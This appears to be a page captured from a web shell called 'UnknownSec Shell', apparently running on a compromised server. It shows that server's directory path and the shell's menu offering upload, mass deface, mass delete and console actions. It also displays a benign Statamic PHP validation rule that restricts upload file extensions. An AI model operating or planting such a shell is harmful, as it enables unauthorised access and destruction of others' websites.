shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Rules
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
AllowedFile.php
<?php namespace Statamic\Rules; use Closure; use Illuminate\Contracts\Validation\ValidationRule; use Illuminate\Http\UploadedFile; class AllowedFile implements ValidationRule { private const EXTENSIONS = [ '7z', 'aiff', 'asc', 'asf', 'avi', 'avif', 'bmp', 'cap', 'cin', 'csv', 'dfxp', 'doc', 'docx', 'dotm', 'dotx', 'fla', 'flv', 'gif', 'gz', 'gzip', 'heic', 'heif', 'hevc', 'itt', 'jp2', 'jpeg', 'jpg', 'jpx', 'js', 'json', 'lrc', 'm2t', 'm4a', 'm4v', 'mcc', 'md', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'mpsub', 'ods', 'odt', 'ogg', 'ogv', 'pdf', 'png', 'potx', 'pps', 'ppsm', 'ppsx', 'ppt', 'pptm', 'pptx', 'ppz', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rt', 'rtf', 'sami', 'sbv', 'scc', 'sdc', 'sitd', 'smi', 'srt', 'stl', 'sub', 'svg', 'swf', 'sxc', 'sxw', 'tar', 'tds', 'tgz', 'tif', 'tiff', 'ttml', 'txt', 'vob', 'vsd', 'vtt', 'wav', 'webm', 'webp', 'wma', 'wmv', 'xls', 'xlsx', 'zip', ]; public function __construct(public ?array $allowedExtensions = null) { } public function validate(string $attribute, mixed $value, Closure $fail): void { if (! $this->isAllowedExtension($value)) { $fail('statamic::validation.uploaded')->translate(); } } private function isAllowedExtension(mixed $file): bool { if (! $file instanceof UploadedFile) { return false; } $extensions = $this->allowedExtensions ?? array_merge(static::EXTENSIONS, config('statamic.assets.additional_uploadable_extensions', [])); return in_array(trim(strtolower($file->getClientOriginalExtension())), $extensions); } }
© 2026 UnknownSec